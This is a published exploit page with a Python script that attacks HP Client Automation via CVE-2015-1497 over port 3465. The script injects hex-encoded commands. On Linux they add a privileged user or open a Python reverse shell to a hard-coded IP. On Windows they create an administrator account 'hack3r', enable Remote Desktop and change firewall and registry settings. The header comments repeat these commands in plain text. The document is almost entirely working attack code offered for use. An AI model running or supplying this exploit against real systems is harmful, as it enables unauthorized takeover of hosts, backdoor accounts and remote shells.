HP Client - Automation Command Injection / Remote Code Execution



EKU-ID: 5909 CVE: 2015-1497 OSVDB-ID:
Author: SlidingWindow Published: 2016-10-11 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: [HP Client - Automation Command Injection]
# Date: [10/10/2016]
# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot
# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]
# Version: [Tested on version 7.9 but should work on  8.1, 9.0, 9.1 too]
# Tested on: [Windows 7 and CentOS release 6.7 (Final)]
# CVE : [CVE-2015-1497]
 
#Can run following commands on linux target
    #Useradd Payload: hide hide sh -c ' useradd amiroot -p ID/JlXFIWowsE  -g root'
    #Reverse Shell Payload: hide hide   sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
 
 
#Runs following commands on Windows target
    #hide hide  cmd.exe /c net user hack3r "hack3r" /add
    #hide hide  cmd.exe /c net localgroup administrators hack3r /add
    #hide hide  cmd.exe /c net localgroup "Remote Desktop Users" hack3r /add
    #hide hide  cmd.exe /c netsh firewall set service RemoteDesktop enable
    #hide hide  cmd/exe /c netsh firewall set service type=RemoteDesktop mode=enable profile=ALL
    #hide hide  cmd/exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
 
 
import sys,socket
 
print("\n# Exploit Title: [HP Client - Automation Command Injection]\n# Date: [10/10/2016]\n# Exploit Author: [SlidingWindow] , Twitter: @kapil_khot\n# Vendor Homepage: [Previosuly HP, now http://www.persistentsys.com/]\n# Version: [7.9, 8.1, 9.0, 9.1]\n# Tested on: [Windows 7, CentOS release 6.7 (Final)]\n# CVE : [CVE-2015-1497]\n")
 
def exploit_Linux(target_IP,exploit_param):
    if exploit_param == "1":
        print("\n[+]Adding privileged user amiroot/nopass")
        request = "\x00"
        request+= "\x31\x32\x33\x31\x32\x33\x00"
        request+= "\x41\x42\x43\x00"
        request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x27\x20\x75\x73\x65\x72\x61\x64\x64\x20\x61\x6d\x69\x72\x6f\x6f\x74\x20\x2d\x70\x20\x49\x44\x2f\x4a\x6c\x58\x46\x49\x57\x6f\x77\x73\x45\x20\x20\x2d\x67\x20\x72\x6f\x6f\x74\x27\x00"
 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_IP, 3465))
        s.send(request)
 
        response = s.recv(1024)
 
        if response == "\x00":
            print("[+]Successfully added user amiroot/nopass")
        else:
            print("[-]Failed to add user amiroot/nopass")
        s.close()
 
    elif exploit_param == "2":
        print("\n[+]Trying to get a reverse shell")
        request = "\x00"
        request+= "\x31\x32\x33\x31\x32\x33\x00"
        request+= "\x41\x42\x43\x00"
 
        #Change this
        #Reverse Shell Payload: hide hide   sh -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.35.140\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
        request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x73\x68\x20\x2d\x63\x20\x22\x70\x79\x74\x68\x6f\x6e\x20\x2d\x63\x20\x27\x69\x6d\x70\x6f\x72\x74\x20\x73\x6f\x63\x6b\x65\x74\x2c\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2c\x6f\x73\x3b\x73\x3d\x73\x6f\x63\x6b\x65\x74\x2e\x73\x6f\x63\x6b\x65\x74\x28\x73\x6f\x63\x6b\x65\x74\x2e\x41\x46\x5f\x49\x4e\x45\x54\x2c\x73\x6f\x63\x6b\x65\x74\x2e\x53\x4f\x43\x4b\x5f\x53\x54\x52\x45\x41\x4d\x29\x3b\x73\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x28\x5c\x22\x31\x30\x2e\x31\x30\x2e\x33\x35\x2e\x31\x34\x30\x5c\x22\x2c\x34\x34\x33\x29\x29\x3b\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x30\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x31\x29\x3b\x20\x6f\x73\x2e\x64\x75\x70\x32\x28\x73\x2e\x66\x69\x6c\x65\x6e\x6f\x28\x29\x2c\x32\x29\x3b\x70\x3d\x73\x75\x62\x70\x72\x6f\x63\x65\x73\x73\x2e\x63\x61\x6c\x6c\x28\x5b\x5c\x22\x2f\x62\x69\x6e\x2f\x73\x68\x5c\x22\x2c\x5c\x22\x2d\x69\x5c\x22\x5d\x29\x3b\x27\x22\x00"
 
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_IP, 3465))
        s.send(request)
 
        response = s.recv(1024)
 
        if response == "\x00":
            print("[+]Exploit completed successfully.\n[+]Try to SSH into the target with username/password: amiroot/nopass")
        else:
            print("[-]Failed to get reverse shell")
        s.close()
 
    else:
        print("\n[-]Invalid exploit parameter provided for Linux target")
        sys.exit()
 
 
def exploit_Windows(target_IP):
    
    counter = 0
    print("[+]Adding a local user hack3r/hack3r")
 
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x68\x61\x63\x6b\x33\x72\x20\x22\x68\x61\x63\x6b\x33\x72\x22\x20\x2f\x61\x64\x64\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
 
    response = s.recv(1024)
 
    if response == "\x00":
        print("[+]Successfully added user hack3r/hack3r")
        counter+= 1
    else:
        print("[-]Failed to add user hack3r/hack3r")
    s.close()
 
 
    print("[+]Adding user 'hack3r' to Local Administrator's group")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
    response = s.recv(1024)
 
    if response == "\x00":
        print("[+]Successfully added user 'hack3r' to Local Administrators group")
        counter+= 1
    else:
        print("[-]Failed to add user to 'hack3r' Local Administrators group")
    s.close()
 
    #Add user Hack3r to "Remote Desktop Users" Group
    print("[+]Adding user 'hack3r' to 'Remote Desktop Users' group")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72\x6f\x75\x70\x20\x22\x52\x65\x6d\x6f\x74\x65\x20\x44\x65\x73\x6b\x74\x6f\x70\x20\x55\x73\x65\x72\x73\x22\x20\x68\x61\x63\x6b\x33\x72\x20\x2f\x61\x64\x64\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
    response = s.recv(1024)
    
    if response == "\x00":
        print("[+]Successfully added user 'hack3r' to 'Remote Desktop Users' group")
        counter+= 1
    else:
        print("[-]Failed to add user 'hack3r' to 'Remote Desktop Users' group")
    s.close()
 
    #Enable RDP
    print("[+]Trying to enable Remote Desktop Service")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x65\x6e\x61\x62\x6c\x65\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
    response = s.recv(1024)
    
    if response == "\x00":
        print("[+]Successfully enabled Remote Desktop Service")
        counter+= 1
    else:
        print("[-]Failed to enable Remote Desktop Service")
    s.close()
 
 
    #Enable RDP for all profiles
    print("[+]Trying to enable Remote Desktop Service for all firewall profiles")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x6e\x65\x74\x73\x68\x20\x66\x69\x72\x65\x77\x61\x6c\x6c\x20\x73\x65\x74\x20\x73\x65\x72\x76\x69\x63\x65\x20\x74\x79\x70\x65\x3d\x52\x65\x6d\x6f\x74\x65\x44\x65\x73\x6b\x74\x6f\x70\x20\x6d\x6f\x64\x65\x3d\x65\x6e\x61\x62\x6c\x65\x20\x70\x72\x6f\x66\x69\x6c\x65\x3d\x41\x4c\x4c\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
    response = s.recv(1024)
    
    if response == "\x00":
        print("[+]Successfully enabled Remote Desktop Service for all firewall profiles")
        counter+= 1
    else:
        print("[-]Failed to enable Remote Desktop Service for all firewall  profiles")
    s.close()
 
    #Setup target to listen for RDP connections
    print("[+]Setting up the target server to listen to RDP connections")
    request = "\x00"
    request+= "\x31\x32\x33\x31\x32\x33\x00"
    request+= "\x41\x42\x43\x00"
    request+= "\x68\x69\x64\x65\x20\x68\x69\x64\x65\x09\x09\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x72\x65\x67\x20\x61\x64\x64\x20\x22\x48\x4b\x45\x59\x5f\x4c\x4f\x43\x41\x4c\x5f\x4d\x41\x43\x48\x49\x4e\x45\x5c\x53\x59\x53\x54\x45\x4d\x5c\x43\x75\x72\x72\x65\x6e\x74\x43\x6f\x6e\x74\x72\x6f\x6c\x53\x65\x74\x5c\x43\x6f\x6e\x74\x72\x6f\x6c\x5c\x54\x65\x72\x6d\x69\x6e\x61\x6c\x20\x53\x65\x72\x76\x65\x72\x22\x20\x2f\x76\x20\x66\x44\x65\x6e\x79\x54\x53\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x73\x20\x2f\x74\x20\x52\x45\x47\x5f\x44\x57\x4f\x52\x44\x20\x2f\x64\x20\x30\x20\x2f\x66\x00"
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_IP, 3465))
    s.send(request)
    response = s.recv(1024)
    
    if response == "\x00":
        print("[+]Successfully setup the target server to listen to RDP connections")
        counter+= 1
    else:
        print("[-]Failed to setup the target server to listen to RDP connections")
    s.close()
 
    if counter == 6:
        print("\n[+]Exploit completed successfully. Try RDP to the target with username/password: hack3r/hack3r")
    else:
        print("\n[-]Exploit Failed..")
 
#main() function here
def main():
    
    if len(sys.argv) < 2:
        print "\n[-]Usage: \nWindows Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Windows\n\nLinux Target:\n\tpython HP_Client_Automation_Exploit.py <target_ip> Linux [1|2]\n\t\t1.Add user\n\t\t2.Reverse Shell"
        sys.exit()
 
    target_IP = sys.argv[1]
    target_OS = sys.argv[2].lower()
    
    if target_OS == "windows":
        exploit_Windows(target_IP)
    elif target_OS == "linux":
        exploit_param = sys.argv[3]
        exploit_Linux(target_IP,exploit_param)
    else:
        print("\n[-]Invalid taret Operating System selected.")
        sys.exit()
        
if __name__ == '__main__':
    main()